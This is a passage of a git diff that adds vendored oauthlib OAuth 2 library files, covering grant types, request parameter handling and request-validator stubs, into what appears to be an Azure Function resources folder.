https://tools.ietf.org/html/rfc6749#section-3.2.1 + if self.request_validator.client_authentication_required(request): + log.debug('Authenticating client, %r.', request) + if not self.request_validator.authenticate_client(request): + log.debug('Invalid client (%r), denying access.', request) + raise errors.InvalidClientError(request=request) + elif not self.request_validator.authenticate_client_id(request.client_id, request): + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + + # Ensure client is authorized use of this grant type + self.validate_grant_type(request) + + # REQUIRED. The refresh token issued to the client. + log.debug('Validating refresh token %s for client %r.', + request.refresh_token, request.client) + if not self.request_validator.validate_refresh_token( + request.refresh_token, request.client, request): + log.debug('Invalid refresh token, %s, for client %r.', + request.refresh_token, request.client) + raise errors.InvalidGrantError(request=request) + + original_scopes = utils.scope_to_list( + self.request_validator.get_original_scopes( + request.refresh_token, request)) + + if request.scope: + request.scopes = utils.scope_to_list(request.scope) + if (not all(s in original_scopes for s in request.scopes) + and not self.request_validator.is_within_original_scope( + request.scopes, request.refresh_token, request)): + log.debug('Refresh token %s lack requested scopes, %r.', + request.refresh_token, request.scopes) + raise errors.InvalidScopeError(request=request) + else: + request.scopes = original_scopes + + for validator in self.custom_validators.post_token: + validator(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py new file mode 100644 index 0000000..fb38bbd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py @@ -0,0 +1,199 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import json +import logging + +from .. import errors +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class ResourceOwnerPasswordCredentialsGrant(GrantTypeBase): + + """`Resource Owner Password Credentials Grant`_ + + The resource owner password credentials grant type is suitable in + cases where the resource owner has a trust relationship with the + client, such as the device operating system or a highly privileged + application. The authorization server should take special care when + enabling this grant type and only allow it when other flows are not + viable. + + This grant type is suitable for clients capable of obtaining the + resource owner's credentials (username and password, typically using + an interactive form). It is also used to migrate existing clients + using direct authentication schemes such as HTTP Basic or Digest + authentication to OAuth by converting the stored credentials to an + access token:: + + +----------+ + | Resource | + | Owner | + | | + +----------+ + v + | Resource Owner + (A) Password Credentials + | + v + +---------+ +---------------+ + | |>--(B)---- Resource Owner ------->| | + | | Password Credentials | Authorization | + | Client | | Server | + | |<--(C)---- Access Token ---------<| | + | | (w/ Optional Refresh Token) | | + +---------+ +---------------+ + + Figure 5: Resource Owner Password Credentials Flow + + The flow illustrated in Figure 5 includes the following steps: + + (A) The resource owner provides the client with its username and + password. + + (B) The client requests an access token from the authorization + server's token endpoint by including the credentials received + from the resource owner. When making the request, the client + authenticates with the authorization server. + + (C) The authorization server authenticates the client and validates + the resource owner credentials, and if valid, issues an access + token. + + .. _`Resource Owner Password Credentials Grant`: https://tools.ietf.org/html/rfc6749#section-4.3 + """ + + def create_token_response(self, request, token_handler): + """Return token or error in json format. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + If the access token request is valid and authorized, the + authorization server issues an access token and optional refresh + token as described in `Section 5.1`_. If the request failed client + authentication or is invalid, the authorization server returns an + error response as described in `Section 5.2`_. + + .. _`Section 5.1`: https://tools.ietf.org/html/rfc6749#section-5.1 + .. _`Section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2 + """ + headers = self._get_default_headers() + try: + if self.request_validator.client_authentication_required(request): + log.debug('Authenticating client, %r.', request) + if not self.request_validator.authenticate_client(request): + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + elif not self.request_validator.authenticate_client_id(request.client_id, request): + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + log.debug('Validating access token request, %r.', request) + self.validate_token_request(request) + except errors.OAuth2Error as e: + log.debug('Client error in token request, %s.', e) + headers.update(e.headers) + return headers, e.json, e.status_code + + token = token_handler.create_token(request, self.refresh_token) + + for modifier in self._token_modifiers: + token = modifier(token) + + self.request_validator.save_token(token, request) + + log.debug('Issuing token %r to client id %r (%r) and username %s.', + token, request.client_id, request.client, request.username) + return headers, json.dumps(token), 200 + + def validate_token_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + The client makes a request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format per Appendix B with a character encoding of UTF-8 in the HTTP + request entity-body: + + grant_type + REQUIRED. Value MUST be set to "password". + + username + REQUIRED. The resource owner username. + + password + REQUIRED. The resource owner password. + + scope + OPTIONAL. The scope of the access request as described by + `Section 3.3`_. + + If the client type is confidential or the client was issued client + credentials (or assigned other authentication requirements), the + client MUST authenticate with the authorization server as described + in `Section 3.2.1`_. + + The authorization server MUST: + + o require client authentication for confidential clients or for any + client that was issued client credentials (or with other + authentication requirements), + + o authenticate the client if client authentication is included, and + + o validate the resource owner password credentials using its + existing password validation algorithm. + + Since this access token request utilizes the resource owner's + password, the authorization server MUST protect the endpoint against + brute force attacks (e.g., using rate-limitation or generating + alerts). + + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + for validator in self.custom_validators.pre_token: + validator(request) + + for param in ('grant_type', 'username', 'password'): + if not getattr(request, param, None): + raise errors.InvalidRequestError( + 'Request is missing %s parameter.' % param, request=request) + + for param in ('grant_type', 'username', 'password', 'scope'): + if param in request.duplicate_params: + raise errors.InvalidRequestError(description='Duplicate %s parameter.' % param, request=request) + + # This error should rarely (if ever) occur if requests are routed to + # grant type handlers based on the grant_type parameter. + if not request.grant_type == 'password': + raise errors.UnsupportedGrantTypeError(request=request) + + log.debug('Validating username %s.', request.username) + if not self.request_validator.validate_user(request.username, + request.password, request.client, request): + raise errors.InvalidGrantError( + 'Invalid credentials given.', request=request) + else: + if not hasattr(request.client, 'client_id'): + raise NotImplementedError( + 'Validate user must set the ' + 'request.client.client_id attribute ' + 'in authenticate_client.') + log.debug('Authorizing access to user %r.', request.user) + + # Ensure client is authorized use of this grant type + self.validate_grant_type(request) + + if request.client: + request.client_id = request.client_id or request.client.client_id + self.validate_scopes(request) + + for validator in self.custom_validators.post_token: + validator(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/parameters.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/parameters.py new file mode 100644 index 0000000..f0639f0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/parameters.py @@ -0,0 +1,471 @@ +""" +oauthlib.oauth2.rfc6749.parameters +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module contains methods related to `Section 4`_ of the OAuth 2 RFC. + +.. _`Section 4`: https://tools.ietf.org/html/rfc6749#section-4 +""" +import json +import os +import time +import urllib.parse as urlparse + +from oauthlib.common import add_params_to_qs, add_params_to_uri +from oauthlib.signals import scope_changed + +from .errors import ( + InsecureTransportError, MismatchingStateError, MissingCodeError, + MissingTokenError, MissingTokenTypeError, raise_from_error, +) +from .tokens import OAuth2Token +from .utils import is_secure_transport, list_to_scope, scope_to_list + + +def prepare_grant_uri(uri, client_id, response_type, redirect_uri=None, + scope=None, state=None, code_challenge=None, code_challenge_method='plain', **kwargs): + """Prepare the authorization grant request URI. + + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the ``application/x-www-form-urlencoded`` format as defined by + [`W3C.REC-html401-19991224`_]: + + :param uri: + :param client_id: The client identifier as described in `Section 2.2`_. + :param response_type: To indicate which OAuth 2 grant/flow is required, + "code" and "token". + :param redirect_uri: The client provided URI to redirect back to after + authorization as described in `Section 3.1.2`_. + :param scope: The scope of the access request as described by + `Section 3.3`_. + :param state: An opaque value used by the client to maintain + state between the request and callback. The authorization + server includes this value when redirecting the user-agent + back to the client. The parameter SHOULD be used for + preventing cross-site request forgery as described in + `Section 10.12`_. + :param code_challenge: PKCE paramater. A challenge derived from the + code_verifier that is sent in the authorization + request, to be verified against later. + :param code_challenge_method: PKCE parameter. A method that was used to derive the + code_challenge. Defaults to "plain" if not present in the request. + :param kwargs: Extra arguments to embed in the grant/authorization URL. + + An example of an authorization code grant authorization URL: + + .. code-block:: http + + GET /authorize?response_type=code&client_id=s6BhdRkqt3&state=xyz + &code_challenge=kjasBS523KdkAILD2k78NdcJSk2k3KHG6&code_challenge_method=S256 + &redirect_uri=https%3A%2F%2Fclient%2Eexample%2Ecom%2Fcb HTTP/1.1 + Host: server.example.com + + .. _`W3C.REC-html401-19991224`: https://tools.ietf.org/html/rfc6749#ref-W3C.REC-html401-19991224 + .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2 + .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12 + """ + if not is_secure_transport(uri): + raise InsecureTransportError() + + params = [(('response_type', response_type)), + (('client_id', client_id))] + + if redirect_uri: + params.append(('redirect_uri', redirect_uri)) + if scope: + params.append(('scope', list_to_scope(scope))) + if state: + params.append(('state', state)) + if code_challenge is not None: + params.append(('code_challenge', code_challenge)) + params.append(('code_challenge_method', code_challenge_method)) + + for k in kwargs: + if kwargs[k]: + params.append((str(k), kwargs[k])) + + return add_params_to_uri(uri, params) + + +def prepare_token_request(grant_type, body='', include_client_id=True, code_verifier=None, **kwargs): + """Prepare the access token request. + + The client makes a request to the token endpoint by adding the + following parameters using the ``application/x-www-form-urlencoded`` + format in the HTTP request entity-body: + + :param grant_type: To indicate grant type being used, i.e. "password", + "authorization_code" or "client_credentials". + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra parameters. Default ''. + + :param include_client_id: `True` (default) to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in + `Section 3.2.1`_. + :type include_client_id: Boolean + + :param client_id: Unicode client identifier. Will only appear if + `include_client_id` is True. * + + :param client_secret: Unicode client secret. Will only appear if set to a + value that is not `None`. Invoking this function with + an empty string will send an empty `client_secret` + value to the server. * + + :param code: If using authorization_code grant, pass the previously + obtained authorization code as the ``code`` argument. * + + :param redirect_uri: If the "redirect_uri" parameter was included in the + authorization request as described in + `Section 4.1.1`_, and their values MUST be identical. * + + :param code_verifier: PKCE parameter. A cryptographically random string that is used to correlate the + authorization request to the token request. + + :param kwargs: Extra arguments to embed in the request body. + + Parameters marked with a `*` above are not explicit arguments in the + function signature, but are specially documented arguments for items + appearing in the generic `**kwargs` keyworded input. + + An example of an authorization code token request body: + + .. code-block:: http + + grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA + &redirect_uri=https%3A%2F%2Fclient%2Eexample%2Ecom%2Fcb + + .. _`Section 4.1.1`: https://tools.ietf.org/html/rfc6749#section-4.1.1 + """ + params = [('grant_type', grant_type)] + + if 'scope' in kwargs: + kwargs['scope'] = list_to_scope(kwargs['scope']) + + # pull the `client_id` out of the kwargs. + client_id = kwargs.pop('client_id', None) + if include_client_id: + if client_id is not None: + params.append(('client_id', client_id)) + + # use code_verifier if code_challenge was passed in the authorization request + if code_verifier is not None: + params.append(('code_verifier', code_verifier)) + + # the kwargs iteration below only supports including boolean truth (truthy) + # values, but some servers may require an empty string for `client_secret` + client_secret = kwargs.pop('client_secret', None) + if client_secret is not None: + params.append(('client_secret', client_secret)) + + # this handles: `code`, `redirect_uri`, and other undocumented params + for k in kwargs: + if kwargs[k]: + params.append((str(k), kwargs[k])) + + return add_params_to_qs(body, params) + + +def prepare_token_revocation_request(url, token, token_type_hint="access_token", + callback=None, body='', **kwargs): + """Prepare a token revocation request. + + The client constructs the request by including the following parameters + using the ``application/x-www-form-urlencoded`` format in the HTTP request + entity-body: + + :param token: REQUIRED. The token that the client wants to get revoked. + + :param token_type_hint: OPTIONAL. A hint about the type of the token + submitted for revocation. Clients MAY pass this + parameter in order to help the authorization server + to optimize the token lookup. If the server is + unable to locate the token using the given hint, it + MUST extend its search across all of its supported + token types. An authorization server MAY ignore + this parameter, particularly if it is able to detect + the token type automatically. + + This specification defines two values for `token_type_hint`: + + * access_token: An access token as defined in [RFC6749], + `Section 1.4`_ + + * refresh_token: A refresh token as defined in [RFC6749], + `Section 1.5`_ + + Specific implementations, profiles, and extensions of this + specification MAY define other values for this parameter using the + registry defined in `Section 4.1.2`_. + + .. _`Section 1.4`: https://tools.ietf.org/html/rfc6749#section-1.4 + .. _`Section 1.5`: https://tools.ietf.org/html/rfc6749#section-1.5 + .. _`Section 4.1.2`: https://tools.ietf.org/html/rfc7009#section-4.1.2 + + """ + if not is_secure_transport(url): + raise InsecureTransportError() + + params = [('token', token)] + + if token_type_hint: + params.append(('token_type_hint', token_type_hint)) + + for k in kwargs: + if kwargs[k]: + params.append((str(k), kwargs[k])) + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + + if callback: + params.append(('callback', callback)) + return add_params_to_uri(url, params), headers, body + else: + return url, headers, add_params_to_qs(body, params) + + +def parse_authorization_code_response(uri, state=None): + """Parse authorization grant response URI into a dict. + + If the resource owner grants the access request, the authorization + server issues an authorization code and delivers it to the client by + adding the following parameters to the query component of the + redirection URI using the ``application/x-www-form-urlencoded`` format: + + **code** + REQUIRED. The authorization code generated by the + authorization server. The authorization code MUST expire + shortly after it is issued to mitigate the risk of leaks. A + maximum authorization code lifetime of 10 minutes is + RECOMMENDED. The client MUST NOT use the authorization code + more than once. If an authorization code is used more than + once, the authorization server MUST deny the request and SHOULD + revoke (when possible) all tokens previously issued based on + that authorization code. The authorization code is bound to + the client identifier and redirection URI. + + **state** + REQUIRED if the "state" parameter was present in the client + authorization request. The exact value received from the + client. + + :param uri: The full redirect URL back to the client. + :param state: The state parameter from the authorization request. + + For example, the authorization server redirects the user-agent by + sending the following HTTP response: + + .. code-block:: http + + HTTP/1.1 302 Found + Location: https://client.example.com/cb?code=SplxlOBeZQQYbYS6WxSbIA + &state=xyz + + """ + if not is_secure_transport(uri): + raise InsecureTransportError() + + query = urlparse.urlparse(uri).query + params = dict(urlparse.parse_qsl(query)) + + if state and params.get('state', None) != state: + raise MismatchingStateError() + + if 'error' in params: + raise_from_error(params.get('error'), params) + + if not 'code' in params: + raise MissingCodeError("Missing code parameter in response.") + + return params + + +def parse_implicit_response(uri, state=None, scope=None): + """Parse the implicit token response URI into a dict. + + If the resource owner grants the access request, the authorization + server issues an access token and delivers it to the client by adding + the following parameters to the fragment component of the redirection + URI using the ``application/x-www-form-urlencoded`` format: + + **access_token** + REQUIRED. The access token issued by the authorization server. + + **token_type** + REQUIRED. The type of the token issued as described in + Section 7.1. Value is case insensitive. + + **expires_in** + RECOMMENDED. The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + + **scope** + OPTIONAL, if identical to the scope requested by the client, + otherwise REQUIRED. The scope of the access token as described + by Section 3.3. + + **state** + REQUIRED if the "state" parameter was present in the client + authorization request. The exact value received from the + client. + + :param uri: + :param state: + :param scope: + + Similar to the authorization code response, but with a full token provided + in the URL fragment: + + .. code-block:: http + + HTTP/1.1 302 Found + Location: http://example.com/cb#access_token=2YotnFZFEjr1zCsicMWpAA + &state=xyz&token_type=example&expires_in=3600 + """ + if not is_secure_transport(uri): + raise InsecureTransportError() + + fragment = urlparse.urlparse(uri).fragment + params = dict(urlparse.parse_qsl(fragment, keep_blank_values=True)) + + for key in ('expires_in',): + if key in params: # cast things to int + params[key] = int(params[key]) + + if 'scope' in params: + params['scope'] = scope_to_list(params['scope']) + + if 'expires_in' in params: + params['expires_at'] = time.time() + int(params['expires_in']) + + if state and params.get('state', None) != state: + raise ValueError("Mismatching or missing state in params.") + + params = OAuth2Token(params, old_scope=scope) + validate_token_parameters(params) + return params + + +def parse_token_response(body, scope=None): + """Parse the JSON token response body into a dict. + + The authorization server issues an access token and optional refresh + token, and constructs the response by adding the following parameters + to the entity body of the HTTP response with a 200 (OK) status code: + + access_token + REQUIRED. The access token issued by the authorization server. + token_type + REQUIRED. The type of the token issued as described in + `Section 7.1`_. Value is case insensitive. + expires_in + RECOMMENDED. The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + refresh_token + OPTIONAL. The refresh token which can be used to obtain new + access tokens using the same authorization grant as described + in `Section 6`_. + scope + OPTIONAL, if identical to the scope requested by the client, + otherwise REQUIRED. The scope of the access token as described + by `Section 3.3`_. + + The parameters are included in the entity body of the HTTP response + using the "application/json" media type as defined by [`RFC4627`_]. The + parameters are serialized into a JSON structure by adding each + parameter at the highest structure level. Parameter names and string + values are included as JSON strings. Numerical values are included + as JSON numbers. The order of parameters does not matter and can + vary. + + :param body: The full json encoded response body. + :param scope: The scope requested during authorization. + + For example: + + .. code-block:: http + + HTTP/1.1 200 OK + Content-Type: application/json + Cache-Control: no-store + Pragma: no-cache + + { + "access_token":"2YotnFZFEjr1zCsicMWpAA", + "token_type":"example", + "expires_in":3600, + "refresh_token":"tGzv3JOkF0XG5Qx2TlKWIA", + "example_parameter":"example_value" + } + + .. _`Section 7.1`: https://tools.ietf.org/html/rfc6749#section-7.1 + .. _`Section 6`: https://tools.ietf.org/html/rfc6749#section-6 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`RFC4627`: https://tools.ietf.org/html/rfc4627 + """ + try: + params = json.loads(body) + except ValueError: + + # Fall back to URL-encoded string, to support old implementations, + # including (at time of writing) Facebook. See: + # https://github.com/oauthlib/oauthlib/issues/267 + + params = dict(urlparse.parse_qsl(body)) + for key in ('expires_in',): + if key in params: # cast things to int + params[key] = int(params[key]) + + if 'scope' in params: + params['scope'] = scope_to_list(params['scope']) + + if 'expires_in' in params: + if params['expires_in'] is None: + params.pop('expires_in') + else: + params['expires_at'] = time.time() + int(params['expires_in']) + + params = OAuth2Token(params, old_scope=scope) + validate_token_parameters(params) + return params + + +def validate_token_parameters(params): + """Ensures token presence, token type, expiration and scope in params.""" + if 'error' in params: + raise_from_error(params.get('error'), params) + + if not 'access_token' in params: + raise MissingTokenError(description="Missing access token parameter.") + + if not 'token_type' in params: + if os.environ.get('OAUTHLIB_STRICT_TOKEN_TYPE'): + raise MissingTokenTypeError() + + # If the issued access token scope is different from the one requested by + # the client, the authorization server MUST include the "scope" response + # parameter to inform the client of the actual scope granted. + # https://tools.ietf.org/html/rfc6749#section-3.3 + if params.scope_changed: + message = 'Scope has changed from "{old}" to "{new}".'.format( + old=params.old_scope, new=params.scope, + ) + scope_changed.send(message=message, old=params.old_scopes, new=params.scopes) + if not os.environ.get('OAUTHLIB_RELAX_TOKEN_SCOPE', None): + w = Warning(message) + w.token = params + w.old_scope = params.old_scopes + w.new_scope = params.scopes + raise w diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/request_validator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/request_validator.py new file mode 100644 index 0000000..71f9707 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/request_validator.py @@ -0,0 +1,676 @@ +""" +oauthlib.oauth2.rfc6749.request_validator +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +log = logging.getLogger(__name__) + + +class RequestValidator: + + def client_authentication_required(self, request, *args, **kwargs): + """Determine if client authentication is required for current request. + + According to the rfc6749, client authentication is required in the following cases: + - Resource Owner Password Credentials Grant, when Client type is Confidential or when + Client was issued client credentials or whenever Client provided client + authentication, see `Section 4.3.2`_. + - Authorization Code Grant, when Client type is Confidential or when Client was issued + client credentials or whenever Client provided client authentication, + see `Section 4.1.3`_. + - Refresh Token Grant, when Client type is Confidential or when Client was issued + client credentials or whenever Client provided client authentication, see + `Section 6`_ + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + - Resource Owner Password Credentials Grant + - Refresh Token Grant + + .. _`Section 4.3.2`: https://tools.ietf.org/html/rfc6749#section-4.3.2 + .. _`Section 4.1.3`: https://tools.ietf.org/html/rfc6749#section-4.1.3 + .. _`Section 6`: https://tools.ietf.org/html/rfc6749#section-6 + """ + return True + + def authenticate_client(self, request, *args, **kwargs): + """Authenticate client through means outside the OAuth 2 spec. + + Means of authentication is negotiated beforehand and may for example + be `HTTP Basic Authentication Scheme`_ which utilizes the Authorization + header. + + Headers may be accesses through request.headers and parameters found in + both body and query can be obtained by direct attribute access, i.e. + request.client_id for client_id in the URL query. + + The authentication process is required to contain the identification of + the client (i.e. search the database based on the client_id). In case the + client doesn't exist based on the received client_id, this method has to + return False and the HTTP response created by the library will contain + 'invalid_client' message. + + After the client identification succeeds, this method needs to set the + client on the request, i.e. request.client = client. A client object's + class must contain the 'client_id' attribute and the 'client_id' must have + a value. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + - Resource Owner Password Credentials Grant (may be disabled) + - Client Credentials Grant + - Refresh Token Grant + + .. _`HTTP Basic Authentication Scheme`: https://tools.ietf.org/html/rfc1945#section-11.1 + """ + raise NotImplementedError('Subclasses must implement this method.') + + def authenticate_client_id(self, client_id, request, *args, **kwargs): + """Ensure client_id belong to a non-confidential client. + + A non-confidential client is one that is not required to authenticate + through other means, such as using HTTP Basic. + + Note, while not strictly necessary it can often be very convenient + to set request.client to the client object associated with the + given client_id. + + :param client_id: Unicode client identifier. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def confirm_redirect_uri(self, client_id, code, redirect_uri, client, request, + *args, **kwargs): + """Ensure that the authorization process represented by this authorization + code began with this 'redirect_uri'. + + If the client specifies a redirect_uri when obtaining code then that + redirect URI must be bound to the code and verified equal in this + method, according to RFC 6749 section 4.1.3. Do not compare against + the client's allowed redirect URIs, but against the URI used when the + code was saved. + + :param client_id: Unicode client identifier. + :param code: Unicode authorization_code. + :param redirect_uri: Unicode absolute URI. + :param client: Client object set by you, see ``.authenticate_client``. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant (during token request) + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_default_redirect_uri(self, client_id, request, *args, **kwargs): + """Get the default redirect URI for the client. + + :param client_id: Unicode client identifier. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: The default redirect URI for the client + + Method is used by: + - Authorization Code Grant + - Implicit Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_default_scopes(self, client_id, request, *args, **kwargs): + """Get the default scopes for the client. + + :param client_id: Unicode client identifier. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: List of default scopes + + Method is used by all core grant types: + - Authorization Code Grant + - Implicit Grant + - Resource Owner Password Credentials Grant + - Client Credentials grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_original_scopes(self, refresh_token, request, *args, **kwargs): + """Get the list of scopes associated with the refresh token. + + :param refresh_token: Unicode refresh token. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: List of scopes. + + Method is used by: + - Refresh token grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def is_within_original_scope(self, request_scopes, refresh_token, request, *args, **kwargs): + """Check if requested scopes are within a scope of the refresh token. + + When access tokens are refreshed the scope of the new token + needs to be within the scope of the original token. This is + ensured by checking that all requested scopes strings are on + the list returned by the get_original_scopes. If this check + fails, is_within_original_scope is called. The method can be + used in situations where returning all valid scopes from the + get_original_scopes is not practical. + + :param request_scopes: A list of scopes that were requested by client. + :param refresh_token: Unicode refresh_token. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Refresh token grant + """ + return False + + def introspect_token(self, token, token_type_hint, request, *args, **kwargs): + """Introspect an access or refresh token. + + Called once the introspect request is validated. This method should + verify the *token* and either return a dictionary with the list of + claims associated, or `None` in case the token is unknown. + + Below the list of registered claims you should be interested in: + - scope : space-separated list of scopes + - client_id : client identifier + - username : human-readable identifier for the resource owner + - token_type : type of the token + - exp : integer timestamp indicating when this token will expire + - iat : integer timestamp indicating when this token was issued + - nbf : integer timestamp indicating when it can be "not-before" used + - sub : subject of the token - identifier of the resource owner + - aud : list of string identifiers representing the intended audience + - iss : string representing issuer of this token + - jti : string identifier for the token + + Note that most of them are coming directly from JWT RFC. More details + can be found in `Introspect Claims`_ or `_JWT Claims`_. + + The implementation can use *token_type_hint* to improve lookup + efficency, but must fallback to other types to be compliant with RFC. + + The dict of claims is added to request.token after this method. + + :param token: The token string. + :param token_type_hint: access_token or refresh_token. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + Method is used by: + - Introspect Endpoint (all grants are compatible) + + .. _`Introspect Claims`: https://tools.ietf.org/html/rfc7662#section-2.2 + .. _`JWT Claims`: https://tools.ietf.org/html/rfc7519#section-4 + """ + raise NotImplementedError('Subclasses must implement this method.') + + def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs): + """Invalidate an authorization code after use. + + :param client_id: Unicode client identifier. + :param code: The authorization code grant (request.code). + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + Method is used by: + - Authorization Code Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def revoke_token(self, token, token_type_hint, request, *args, **kwargs): + """Revoke an access or refresh token. + + :param token: The token string. + :param token_type_hint: access_token or refresh_token. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + Method is used by: + - Revocation Endpoint + """ + raise NotImplementedError('Subclasses must implement this method.') + + def rotate_refresh_token(self, request): + """Determine whether to rotate the refresh token. Default, yes. + + When access tokens are refreshed the old refresh token can be kept + or replaced with a new one (rotated). Return True to rotate and + and False for keeping original. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Refresh Token Grant + """ + return True + + def save_authorization_code(self, client_id, code, request, *args, **kwargs): + """Persist the authorization_code. + + The code should at minimum be stored with: + - the client_id (``client_id``) + - the redirect URI used (``request.redirect_uri``) + - a resource owner / user (``request.user``) + - the authorized scopes (``request.scopes``) + + To support PKCE, you MUST associate the code with: + - Code Challenge (``request.code_challenge``) and + - Code Challenge Method (``request.code_challenge_method``) + + To support OIDC, you MUST associate the code with: + - nonce, if present (``code["nonce"]``) + + The ``code`` argument is actually a dictionary, containing at least a + ``code`` key with the actual authorization code: + + ``{'code': 'sdf345jsdf0934f'}`` + + It may also have a ``claims`` parameter which, when present, will be a dict + deserialized from JSON as described at + http://openid.net/specs/openid-connect-core-1_0.html#ClaimsParameter + This value should be saved in this method and used again in ``.validate_code``. + + :param client_id: Unicode client identifier. + :param code: A dict of the authorization code grant and, optionally, state. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + Method is used by: + - Authorization Code Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def save_token(self, token, request, *args, **kwargs): + """Persist the token with a token type specific method. + + Currently, only save_bearer_token is supported. + + :param token: A (Bearer) token dict. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + return self.save_bearer_token(token, request, *args, **kwargs) + + def save_bearer_token(self, token, request, *args, **kwargs): + """Persist the Bearer token. + + The Bearer token should at minimum be associated with: + - a client and it's client_id, if available + - a resource owner / user (request.user) + - authorized scopes (request.scopes) + - an expiration time + - a refresh token, if issued + - a claims document, if present in request.claims + + The Bearer token dict may hold a number of items:: + + { + 'token_type': 'Bearer', + 'access_token': 'askfjh234as9sd8', + 'expires_in': 3600, + 'scope': 'string of space separated authorized scopes', + 'refresh_token': '23sdf876234', # if issued + 'state': 'given_by_client', # if supplied by client (implicit ONLY) + } + + Note that while "scope" is a string-separated list of authorized scopes, + the original list is still available in request.scopes. + + The token dict is passed as a reference so any changes made to the dictionary + will go back to the user. If additional information must return to the client + user, and it is only possible to get this information after writing the token + to storage, it should be added to the token dictionary. If the token + dictionary must be modified but the changes should not go back to the user, + a copy of the dictionary must be made before making the changes. + + Also note that if an Authorization Code grant request included a valid claims + parameter (for OpenID Connect) then the request.claims property will contain + the claims dict, which should be saved for later use when generating the + id_token and/or UserInfo response content. + + :param token: A Bearer token dict. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: The default redirect URI for the client + + Method is used by all core grant types issuing Bearer tokens: + - Authorization Code Grant + - Implicit Grant + - Resource Owner Password Credentials Grant (might not associate a client) + - Client Credentials grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_bearer_token(self, token, scopes, request): + """Ensure the Bearer token is valid and authorized access to scopes. + + :param token: A string of random characters. + :param scopes: A list of scopes associated with the protected resource. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + A key to OAuth 2 security and restricting impact of leaked tokens is + the short expiration time of tokens, *always ensure the token has not + expired!*. + + Two different approaches to scope validation: + + 1) all(scopes). The token must be authorized access to all scopes + associated with the resource. For example, the + token has access to ``read-only`` and ``images``, + thus the client can view images but not upload new. + Allows for fine grained access control through + combining various scopes. + + 2) any(scopes). The token must be authorized access to one of the + scopes 